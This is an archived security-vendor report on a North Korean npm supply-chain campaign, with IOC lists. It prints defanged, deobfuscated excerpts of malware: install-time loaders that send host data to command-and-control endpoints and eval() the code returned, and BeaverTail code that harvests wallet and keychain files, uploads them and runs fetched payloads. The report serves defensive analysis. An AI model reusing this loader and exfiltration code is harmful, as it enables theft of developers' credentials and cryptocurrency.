{ "id": "86aabe16-2e2f-4d7d-90bf-9318bf93d73b", "created_at": "2026-04-06T00:13:55.076472Z", "updated_at": "2026-04-10T03:36:48.381561Z", "deleted_at": null, "sha1_hash": "d7824e7fe8cfc6dea776a75f4c7ce0e70ab9e41e", "title": "Contagious Interview Campaign Escalates With 67 Malicious np...", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1364993, "plain_text": "Contagious Interview Campaign Escalates With 67 Malicious np...\r\nArchived: 2026-04-05 16:58:03 UTC\r\nSecure your dependencies with us\r\nSocket proactively blocks malicious open source packages in your code.\r\nInstall\r\nThe Socket Threat Research Team has uncovered a new North Korean software supply chain attack involving a\r\npreviously unreported malware loader we call XORIndex. This activity is an expansion of the campaign we\r\nreported in June 2025, which deployed the HexEval Loader. In this latest wave, the North Korean threat actors\r\nbehind the Contagious Interview operation infiltrated the npm ecosystem with 67 malicious packages, collectively\r\ndownloaded more than 17,000 times. 27 of these packages remain live on the npm registry. We have submitted\r\ntakedown requests to the npm security team and petitioned for the suspension of the associated accounts.\r\nhttps://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages\r\nPage 1 of 16\n\nThe full list of packages is provided in the IOCs section of this report. Based on current patterns, we assess that\r\nadditional packages tied to the XORIndex and HexEval Loader campaigns are likely to surface. The Contagious\r\nInterview operation continues to follow a whack-a-mole dynamic, where defenders detect and report malicious\r\npackages, and North Korean threat actors quickly respond by uploading new variants using the same, similar, or\r\nslightly evolved playbooks.\r\nThe HexEval Loader campaign shows no signs of slowing down, as the threat actors continue uploading malicious\r\npackages to the npm registry. With the emergence of the XORIndex Loader (named for its use of XOR-encoded\r\nstrings and index-based obfuscation) they have expanded their tooling with a new loader, also designed to evade\r\ndetection.\r\nAs in the HexEval campaign, the XORIndex Loader collects host metadata, decodes its follow-on script, and,\r\nwhen triggered, fetches and executes BeaverTail — the staple second-stage malware in the North Korean\r\nContagious Interview threat actors’ arsenal. BeaverTail, in turn, references InvisibleFerret, a known third-stage\r\nbackdoor linked to this operation.\r\nThe two campaigns now operate in parallel. XORIndex has accumulated over 9,000 downloads in a short window\r\n(June to July 2025), while HexEval continues at a steady pace, with more than 8,000 additional downloads across\r\nthe newly discovered packages.\r\nWe expect the North Korean threat actors to reuse existing loaders like HexEval and XORIndex, while\r\nintroducing new obfuscation techniques and loader variants. Their focus remains on infiltrating software supply\r\nchains and targeting developers, job seekers, and individuals they believe possess cryptocurrency or sensitive\r\ncredentials. As our previous reporting shows, these well-resourced, financially-motivated, and state-backed threat\r\nactors do not hesitate to target smaller organizations and individuals.\r\nhttps://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages\r\nPage 2 of 16\n\nTimeline of HexEval and XORIndex Loader campaigns showing parallel waves of malicious npm\r\npackage deployments by North Korean threat actors from April to July 2025. This latest wave includes\r\n67 previously unreported packages: 39 new HexEval Loader and 28 XORIndex Loader packages.\r\nEarlier waves: 4 packages in April 2025 and 35 in June 2025 were detailed in our prior research.\r\nXORIndex Loader#\r\nIn the XORIndex Loader campaign, we identified 28 malicious npm packages distributed across 18 npm accounts\r\nregistered using 15 distinct email addresses. Consistent with the HexEval Loader campaign, the malware relies on\r\nhardcoded command and control (C2) infrastructure delivering the /api/ipcheck callback. The five known\r\nendpoints include:\r\n1. https://soc-log[.]vercel[.]app/api/ipcheck\r\n2. https://1215[.]vercel[.]app/api/ipcheck\r\n3. https://log-writter[.]vercel[.]app/api/ipcheck\r\n4. https://process-log-update[.]vercel[.]app/api/ipcheck\r\n5. https://api[.]npoint[.]io/1f901a22daea7694face (a likely initial configuration fetch).\r\nPackage-naming patterns (e.g., vite-* , *-log* ), the presence of BeaverTail malware, and references to the\r\nInvisibleFerret backdoor link the XORIndex campaign to earlier Contagious Interview operations we previously\r\ndocumented.\r\nThe following commented excerpt from the deobfuscated eth-auditlog package demonstrates a typical instance\r\nof the XORIndex Loader.\r\n// Dependencies and utilities\r\nconst axios = require(\"axios\");\r\nconst os = require(\"os\");\r\nconst publicIp = (await import(\"public-ip\")).default;\r\n// XOR-decode function for obfuscated strings (simplified)\r\nfunction xorDecode(hexStr) { /* … */ }\r\n// Collects local telemetry (host/user/IP/geo/platform)\r\nasync function gatherInfo() {\r\n const ip = await publicIp.v4(); // External IP\r\n const geo = (await axios.get(`http://ip-api.com/json/${ip}`)).data;\r\n return {\r\n host: os.hostname(), // System hostname\r\n user: os.userInfo().username, // Current OS username\r\n ip,\r\n location: geo, // Geolocation metadata\r\n platform: os.platform() // OS identifier\r\n };\r\n}\r\nhttps://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages\r\nPage 3 of 16\n\n// Sends beacon and executes threat actor-supplied JavaScript payloads\r\nmodule.exports = async function writer() {\r\n const info = await gatherInfo();\r\n const version = process.env.npm_package_version;\r\n // POST telemetry to C2 endpoint (defanged) and execute returned payloads\r\n axios.post(\"https://log-writter[.]vercel[.]app/api/ipcheck\",\r\n { ...info, version })\r\n .then(res =\u003e {\r\n eval(res.data.s1); // Execute primary threat actor's payload\r\n eval(res.data.s2); // Execute optional secondary payload\r\n })\r\n .catch(() =\u003e console.log(\"write f callback error\");\r\n};\r\nUpon installation, eth-auditlog collects local host telemetry, including hostname, current username, OS type,\r\nexternal IP address, basic geolocation, and the package’s version, then exfiltrates this data to a hardcoded C2\r\n( https://log-writter[.]vercel[.]app/api/ipcheck ) endpoint. It subsequently executes arbitrary JavaScript\r\ncode via eval() , loading the second-stage malware BeaverTail, which contains references to the third-stage\r\nbackdoor InvisibleFerret. The malicious code is platform-agnostic, functioning across Windows, macOS, and\r\nLinux, but specifically targets the Node.js ecosystem, primarily developers installing npm packages.\r\nBeaverTail#\r\nThe second-stage malware delivered by the XORIndex Loader via the eth-auditlog package is BeaverTail —\r\nthe hallmark payload of the North Korean Contagious Interview operations. It scans for dozens of known desktop\r\nwallet directories and browser extension paths, archives the collected data, and exfiltrates it to a hardcoded IP-based HTTP endpoint. Several string constants in the code match wallet and extension identifiers previously\r\nattributed to BeaverTail. BeaverTail downloads additional payloads, such as the InvisibleFerret backdoor, using\r\nfilenames like p.zi or p2.zip .\r\nThe following deobfuscated, defanged, and commented excerpt illustrates the BeaverTail second-stage malware\r\nthat is executed after installation of the eth-auditlog package.\r\n// Wallet / Key store targets\r\nconst WALLET_IDS = [\r\n 'nkbihfbeog', // MetaMask browser extension ID\r\n 'iijedngplf', // Coinbase Wallet extension ID\r\n 'cgndfolcbk', // Phantom (Chrome) extension ID\r\n 'bohpjbbldc', // TronLink extension ID\r\n // …46 more IDs …\r\n];\r\nhttps://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages\r\nPage 4 of 16\n\nconst FILE_PATTERNS = [\r\n '/Library/Application Support/Exodus/', // Exodus wallet config\r\n '/Library/Application Support/BraveSoftware/', // Brave browser profiles\r\n '/.config/solana/solana_id.json', // Solana CLI keypair\r\n 'Login.keychain', // macOS system keychain file\r\n // …\r\n];\r\n// File collection and exfiltration\r\nfunction harvest() { // Primary execution routine\r\n const tmpZip = path.join(os.tmpdir(), 'p2.zip');\r\n const zip = new AdmZip(); // Dependency for archiving\r\n scanAndAdd(zip, WALLET_IDS, FILE_PATTERNS); // Search and match files\r\n zip.writeZip(tmpZip);\r\n // Exfiltrate collected archive via HTTP POST\r\n return axios.post('http://144[.]217[.]86[.]88/uploads', // Hardcoded C2\r\n fs.createReadStream(tmpZip),\r\n { headers: { 'Content-Type': 'application/zip' } });\r\n}\r\n// Optional payload fetch and execution\r\naxios.get('http://144[.]217[.]86[.]88/download') // Fetch remote payload\r\n .then(r =\u003e Function(r.data)()) // Execute via Function\r\nThe malware enumerates nearly 50 wallet paths (e.g. Exodus, MetaMask, Phantom, Keplr, and TronLink) and\r\ninspects user profiles for Chromium- and Gecko-based browsers (Brave, Chrome, Firefox, Opera, Edge) to locate\r\nextension storage directories. It searches for sensitive files such as *.ldb , RTCDataChannel , keychain-db , and\r\nseed files matching *.json patterns. Collected data is archived into p2.zip using the embedded adm-zip\r\nmodule and written to the system’s temporary directory. The archive is exfiltrated via HTTP POST to\r\nhttp://144[.]217[.]86[.]88/uploads . Exfiltrated contents include wallet databases, browser extension local\r\nstorage, macOS keychain credentials, Solana IDs, and wallet-related JSON files. On successful upload, the\r\narchive is deleted. The malware then attempts to fetch a third-stage malware from the same host and executes it in\r\nmemory using Function() . This behavior aligns with the established BeaverTail to InvisibleFerret execution\r\nchain.\r\nXORIndex Loader Evolution#\r\npostcss-preloader — First-Generation XORIndex Loader\r\nWe identified earlier variants of the XORIndex Loader likely used for testing, which lacked obfuscation and\r\noffered limited or no host reconnaissance capabilities. One such example is postcss-preloader — an aptly\r\nnamed loader prototype.\r\nhttps://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages\r\nPage 5 of 16\n\nDuring installation, postcss-preloader silently contacts a hardcoded C2 endpoint and executes any JavaScript\r\ncode returned by the server. Unlike later XORIndex Loader variants, it omits string obfuscation, host metadata\r\ncollection, and endpoint rotation. Yet, it still provides the threat actors with full remote code execution,\r\nhighlighting the foundational capabilities of this malware loader.\r\nThe following commented and defanged excerpt from the postcss-preloader package demonstrates the first\r\nprototype version of the XORIndex Loader.\r\n\"use strict\";\r\nconst axios = require(\"axios\"); // Sends HTTP requests\r\nconst os = require(\"os\"); // Unused (likely decoy)\r\nrequire(\"dotenv\").config(); // Loads .env (optional)\r\n// Postinstall callback\r\nconst writer = async () =\u003e {\r\n try {\r\n const version = process.env.npm_package_version;\r\n // Beacon to threat actor's C2\r\n axios\r\n .post(\"https://soc-log[.]vercel[.]app/api/ipcheck\", { version })\r\n .then((r) =\u003e {\r\n eval(r.data.model); // Executes server-sent JS code\r\n });\r\n } catch (error) {\r\n // Silent fail\r\n }\r\n};\r\nmodule.exports = writer; // Auto-invoked postinstall entry\r\njs-log-print — Second-Generation XORIndex Loader\r\njs-log-print retains the same basic post-install remote code execution behavior as the initial postcss-preloader version but introduces rudimentary host reconnaissance, attempting to collect the hostname, username,\r\nexternal IP, geolocation, and OS type. However, due to a bug in the external IP retrieval logic, the ip and\r\nlocation fields are typically undefined or null. Unlike the fully developed XORIndex loader, it lacks string\r\nobfuscation and multi-endpoint rotation.\r\nThe following commented and defanged excerpt from the js-log-print package demonstrates a transitional\r\nstage of the XORIndex Loader.\r\nhttps://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages\r\nPage 6 of 16\n\n\"use strict\";\r\nconst axios = require(\"axios\"); // HTTP client for API calls\r\nconst os = require(\"os\"); // Access to system info\r\nrequire(\"dotenv\").config(); // Load environment variables\r\n// Attempts to get external IP (BUG: returns nothing)\r\nasync function geuicp() {\r\n const publicIp = await import(\"public-ip\");\r\n const ip = await publicIp.publicIpv4(); // IP fetched but never returned\r\n}\r\n// Collects system telemetry\r\nasync function genfo() {\r\n try {\r\n const hoame = os.hostname(); // Hostname\r\n const uame = os.userInfo().username; // Username\r\n const ip = await geuicp(); // External IP (fails)\r\n const location = await getP(ip); // Country\r\n const sype = os.type(); // OS type\r\n return { hoame, ip, location, uame, sype };\r\n } catch (error) {}\r\n}\r\n// Performs IP geolocation lookup\r\nasync function getP(ip) {\r\n try {\r\n const response = await axios.get(`https://ipapi.co/${ip}/json/`);\r\n return response.data.country_name;\r\n } catch (error) {\r\n return null;\r\n }\r\n}\r\n// Sends host data to C2 and executes returned code\r\nconst writer = async () =\u003e {\r\n try {\r\n const synfo = await genfo(); // Gather system data\r\n const version = process.env.npm_package_version; // npm package version\r\n axios\r\n .post(\"https://log-writter[.]vercel[.]app/api/ipcheck\", { ...synfo, version })\r\n .then((r) =\u003e {\r\n eval(r.data.model); // Execute threat actor's code\r\nhttps://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages\r\nPage 7 of 16\n\n});\r\n } catch (error) {}\r\n};\r\nmodule.exports = writer; // Exported as postinstall entry\r\ndev-filterjs — Third-Generation XORIndex Loader\r\ndev-filterjs introduces the threat actors’ first use of string-level obfuscation (ASCII buffer decoded via\r\nTextDecoder ) while retaining the same post-install beacon-and-eval pattern. Reconnaissance logic from the\r\nsecond prototype remains and now successfully transmits the external IP and country data.\r\nThe following commented and defanged excerpt from the dev-filterjs package demonstrates the first use of\r\nstring-level obfuscation in the XORIndex Loader.\r\n\"use strict\";\r\nconst axios = require(\"axios\");\r\nconst os = require(\"os\");\r\nrequire('dotenv').config(); // Load environment variables\r\n// Returns external IP (used for geo lookup)\r\nasync function geuicp() {\r\n const publicIp = await import('public-ip');\r\n return publicIp.publicIpv4();\r\n}\r\n// Collects basic system telemetry\r\nasync function genfo() {\r\n try {\r\n const hoame = os.hostname(); // Hostname\r\n const uame = os.userInfo().username; // Username\r\n const ip = await geuicp(); // External IP\r\n const location = await getP(ip); // Country name\r\n const sype = os.type(); // OS type\r\n return { hoame, ip, location, uame, sype };\r\n } catch (error) {\r\n console.error('Error collecting telemetry:', error);\r\n throw error;\r\n }\r\n}\r\n// Maps IP to country using ipapi.co\r\nasync function getP(ip) {\r\n try {\r\n const response = await axios.get(`https://ipapi.co/${ip}/json/`);\r\nhttps://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages\r\nPage 8 of 16\n\nreturn response.data.country_name;\r\n } catch (error) {\r\n console.error('Geo lookup failed:', error.message);\r\n return null;\r\n }\r\n}\r\n// Main loader logic (runs automatically post-install)\r\n(async () =\u003e {\r\n try {\r\n // Decode hardcoded C2 URL\r\n const uint8Array = new Uint8Array([\r\n 104, 116, 116, 112, 115, 58, 47, 47, 108, 111, 103, 45, 119, 114, 105, 116,\r\n 116, 101, 114, 46, 118, 101, 114, 99, 101, 108, 46, 97, 112, 112, 47, 97,\r\n 112, 105, 47, 105, 112, 99, 104, 101, 99, 107\r\n ]);\r\n const decodeURL = new TextDecoder().decode(uint8Array);\r\n const version = \"0.3.2\";\r\n const synfo = await genfo(); // Gather telemetry\r\n // Send beacon to C2 and execute returned JS payload\r\n axios.post(decodeURL, { ...synfo, version })\r\n .then((r) =\u003e {\r\n eval(r.data.model); // Execute threat actor-supplied code\r\n });\r\n } catch (error) {\r\n // Silently fail\r\n }\r\n})();\r\n// Exported only for reuse/debug purposes\r\nmodule.exports = genfo;\r\nThe XORIndex Loader exhibits a deliberate and rapid evolution from proof-of-concept to fully featured malware\r\nloader. The initial postcss-preloader was a bare-bones remote code execution loader with no obfuscation or\r\nhost profiling. The second prototype, js-log-print , introduced rudimentary reconnaissance capabilities though\r\nit remained unobfuscated. The third iteration, dev-filterjs , marked the threat actors’ first use of string\r\nobfuscation via ASCII buffers and TextDecoder. In contrast, the latest XORIndex Loader variants incorporate\r\nXOR-based string hiding, multi-endpoint C2 rotation, host profiling, and dual eval() execution paths. Across all\r\nversions, the threat actors consistently reuse a shared C2 infrastructure hosted on Vercel under the /api/ipcheck\r\npath.\r\nThis progression reflects the North Korean Contagious Interview threat actors’ ongoing investment in stealthier,\r\nmore resilient software supply chain malware; moving from simple prototypes to modular loaders capable of full\r\nsystem compromise.\r\nhttps://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages\r\nPage 9 of 16\n\nSocket’s AI scanner includes contextual analysis of the latest XORIndex Loader variant found in the\r\nmalicious cronek package.\r\nSocket’s view of the obfuscated code in the cronek package.\r\nOutlook and Recommendations#\r\nhttps://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages\r\nPage 10 of 16\n\nContagious Interview threat actors will continue to diversify their malware portfolio, rotating through new npm\r\nmaintainer aliases, reusing loaders such as HexEval Loader and malware families like BeaverTail and\r\nInvisibleFerret, and actively deploying newly observed variants including XORIndex Loader.\r\nDefenders should expect continued iterations of these loaders across newly published packages, often with slight\r\nvariations to evade detection. The threat actors’ consistent use of legitimate infrastructure providers like Vercel for\r\nC2 lowers operational overhead and may influence similar adoption by other APTs or cybercriminal groups.\r\nEvasive methods such as memory-only execution and obfuscation will likely increase, complicating detection and\r\nincident response.\r\nSecurity teams should treat these incidents as persistent, evolving threats. Developers, particularly those in\r\nDevOps, open source, or infrastructure engineering roles, remain prime targets due to their elevated access and\r\ntrust within the ecosystem. Proactive supply chain defense must become a standard part of secure software\r\ndevelopment.\r\nSocket equips organizations to defend against this evolving threat. The Socket GitHub App enables real-time pull\r\nrequest scanning to catch malicious dependencies before they are merged. The Socket CLI flags suspicious\r\nbehavior during npm install , giving immediate visibility into risk. And the Socket browser extension adds\r\nsecurity metrics to package pages and search results, helping users identify threats in open source packages before\r\ninstallation.\r\nIndicators of Compromise (IOCs)#\r\nMalicious npm Packages With XORIndex Loader#\r\n1. vite-meta-plugin (live at time of publication; removal requested)\r\n2. vite-postcss-tools (live at time of publication; removal requested)\r\n3. pretty-chalk (live at time of publication; removal requested)\r\n4. vite-usageit (live at time of publication; removal requested)\r\n5. ecom-config (live at time of publication; removal requested)\r\n6. flowframe (live at time of publication; removal requested)\r\n7. proc-logger (live at time of publication; removal requested)\r\n8. vite-log-handler (live at time of publication; removal requested)\r\n9. cronek (live at time of publication; removal requested)\r\n10. vite-proc-log (live at time of publication; removal requested)\r\n11. vite-plugin-enhance\r\n12. postcss-preloader\r\n13. vite-logify\r\n14. js-log-print\r\n15. vite-logging-tool\r\n16. dev-filterjs\r\n17. eth-auditlog\r\n18. midd-js\r\n19. flowmark\r\nhttps://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages\r\nPage 11 of 16\n\n20. vitejs-log\r\n21. utx-config\r\n22. figwrap\r\n23. springboot-js\r\n24. springboot-md\r\n25. 1imit\r\n26. phlib-config\r\n27. middy-js\r\n28. vite-tsconfig-log\r\nnpm Aliases\r\n1. h96452582\r\n2. devin-ta39\r\n3. csilvagalaxy\r\n4. alisson_dev\r\n5. dmytryi\r\n6. drgru\r\n7. ahmadbahai\r\n8. stefanofrick2\r\n9. samuelhuggins\r\n10. jgod19960520\r\n11. monster1117\r\n12. marilin\r\n13. jasonharry1988\r\n14. davidmoberly\r\n15. vitalii0021\r\n16. rory210\r\n17. jasonharry198852\r\n18. millos\r\nEmail Addresses\r\n1. h96452582@gmail[.]com\r\n2. devin.s@gedu[.]demo[.]ta-39[.]com\r\n3. csilvagalaxy87@gmail[.]com\r\n4. souzaporto800@gmail[.]com\r\n5. dmytroputko@gmail[.]com\r\n6. drgru854@gmail[.]com\r\n7. ahmadbahai07@gmail[.]com\r\n8. stefanofrick2@gmail[.]com\r\n9. samuelhuggins3@gmail[.]com\r\n10. jgod19960520@outlook[.]com\r\nhttps://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages\r\nPage 12 of 16\n\n11. filip.porter9017@outlook[.]com\r\n12. r29728098@gmail[.]com\r\n13. vitalii214.ilnytskyi@gmail[.]com\r\n14. jasonharry198852@gmail[.]com\r\n15. millosmike3@gmail[.]com\r\nMalicious npm Packages With HexEval Loader#\r\n1. nextjs-https-supertest (live at time of publication; removal requested)\r\n2. nextjs-package-purify (live at time of publication; removal requested)\r\n3. jsonslicer (live at time of publication; removal requested)\r\n4. node-mongo-orm (live at time of publication; removal requested)\r\n5. parsing-query (live at time of publication; removal requested)\r\n6. tailwind-config-plugin (live at time of publication; removal requested)\r\n7. nodestream-log (live at time of publication; removal requested)\r\n8. vite-lightparse (live at time of publication; removal requested)\r\n9. pino-req (live at time of publication; removal requested)\r\n10. tailwind-base-theme (live at time of publication; removal requested)\r\n11. js-prettier (live at time of publication; removal requested)\r\n12. notifier-loggers (live at time of publication; removal requested)\r\n13. querypilot (live at time of publication; removal requested)\r\n14. vitejs-plugin-refresh (live at time of publication; removal requested)\r\n15. jsonlis-conf (live at time of publication; removal requested)\r\n16. node-mongodb-logger (live at time of publication; removal requested)\r\n17. jsonloggers\r\n18. async-queuelite\r\n19. node-mongoose-orm\r\n20. jsonwebstr\r\n21. parser-query\r\n22. node-log-streamer\r\n23. jsonli-conf\r\n24. notification-loggers\r\n25. notification-logs\r\n26. logs-bind\r\n27. jsons-pack\r\n28. reqweaver\r\n29. servula\r\n30. reqnexus\r\n31. velocky\r\n32. flush-plugins\r\n33. jsonlogs\r\n34. jsontostr\r\n35. husky-logger\r\nhttps://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages\r\nPage 13 of 16\n\n36. node-mongodb-orm\r\n37. jsonskipy\r\n38. restpilot\r\n39. jsonspack-logger\r\nnpm Aliases\r\n1. denniswinter\r\n2. magalhaesbruno236\r\n3. backsonblau\r\n4. jinping\r\n5. rodolfo010813\r\n6. david262721\r\n7. christacole\r\n8. oleksandr522\r\n9. hera0204\r\n10. hamid1997\r\n11. kingxianstar\r\n12. daphneyrath\r\n13. garner_dev\r\n14. alex.c11\r\n15. dan436\r\n16. jennyjenkins\r\n17. david36271\r\n18. yoga001\r\n19. astro847\r\n20. stardev47\r\n21. ahmedays\r\n22. devcrimson\r\n23. derek00144\r\n24. devin1571\r\n25. stormdev0418\r\n26. jinping0822\r\n27. davisjosephinewnk\r\n28. jaksonas11\r\n29. liamnevin\r\nEmail Addresses\r\n1. denniswinter727@outlook[.]com\r\n2. magalhaesbruno236@gmail[.]com\r\n3. jacksonblau11ai@gmail[.]com\r\n4. jinping0821@outlook[.]com\r\nhttps://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages\r\nPage 14 of 16\n\n5. rodolfguerr@gmail[.]com\r\n6. david262721@outlook[.]com\r\n7. chulovskaolena@outlook[.]com\r\n8. oleksandrkazadaiev522@gmail[.]com\r\n9. hera19970204@outlook[.]com\r\n10. zeus19970204@outlook[.]com\r\n11. imanwdr30@hotmail[.]com\r\n12. scarlet112603@outlook[.]com\r\n13. garnerbrandy1230@gmail[.]com\r\n14. alexandercruciata11@gmail[.]com\r\n15. danxeth436@gmail[.]com\r\n16. jennyjenkins783@gmail[.]com\r\n17. david36271@outlook[.]com\r\n18. rkupriyanof@gmail[.]com\r\n19. vallierhilaire@gmail[.]com\r\n20. willsuccess47@gmail[.]com\r\n21. ahmedali06091@gmail[.]com\r\n22. c258789456@gmail[.]com\r\n23. derek00144@gmail[.]com\r\n24. devin1571@outlook[.]com\r\n25. star712418@gmail[.]com\r\n26. jinping0822@outlook[.]com\r\n27. davisjosephinewnk807@outlook[.]com\r\n28. jaksonas11@outlook[.]com\r\n29. hades19910712@outlook[.]com\r\nCommand and Control (C2) Endpoints#\r\n1. https://soc-log[.]vercel[.]app/api/ipcheck\r\n2. https://1215[.]vercel[.]app/api/ipcheck\r\n3. https://log-writter[.]vercel[.]app/api/ipcheck\r\n4. https://process-log-update[.]vercel[.]app/api/ipcheck\r\n5. https://api[.]npoint[.]io/1f901a22daea7694face\r\n6. 144[.]217[.]86[.]88\r\nMITRE ATT\u0026CK Techniques#\r\nT1195.002 — Supply Chain Compromise: Compromise Software Supply Chain\r\nT1608.001 — Stage Capabilities: Upload Malware\r\nT1204.002 — User Execution: Malicious File\r\nT1059.007 — Command and Scripting Interpreter: JavaScript\r\nT1027.013 — Obfuscated Files or Information: Encrypted/Encoded File\r\nT1546.016 — Event Triggered Execution: Installer Packages\r\nhttps://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages\r\nPage 15 of 16\n\nT1005 — Data from Local System\r\nT1082 — System Information Discovery\r\nT1083 — File and Directory Discovery\r\nT1217 — Browser Information Discovery\r\nT1555.003 — Credentials from Password Stores: Credentials from Web Browsers\r\nT1555.001 — Credentials from Password Stores: Keychain\r\nT1041 — Exfiltration Over C2 Channel\r\nT1105 — Ingress Tool Transfer\r\nT1119 — Automated Collection\r\nT1657 — Financial Theft\r\nSource: https://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages\r\nhttps://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA", "MITRE" ], "references": [ "https://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages" ], "report_names": [ "contagious-interview-campaign-escalates-67-malicious-npm-packages" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "4fc99d9b-9b66-4516-b0db-520fbef049ed", "created_at": "2025-10-29T02:00:51.949631Z", "updated_at": "2026-04-10T02:00:05.346203Z", "deleted_at": null, "main_name": "Contagious Interview", "aliases": [ "Contagious Interview", "DeceptiveDevelopment", "Gwisin Gang", "Tenacious Pungsan", "DEV#POPPER", "PurpleBravo", "TAG-121" ], "source_name": "MITRE:Contagious Interview", "tools": [ "InvisibleFerret", "BeaverTail", "XORIndex Loader", "HexEval Loader" ], "source_id": "MITRE", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434435, "ts_updated_at": 1775792208, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d7824e7fe8cfc6dea776a75f4c7ce0e70ab9e41e.pdf", "text": "https://archive.orkl.eu/d7824e7fe8cfc6dea776a75f4c7ce0e70ab9e41e.txt", "img": "https://archive.orkl.eu/d7824e7fe8cfc6dea776a75f4c7ce0e70ab9e41e.jpg" } }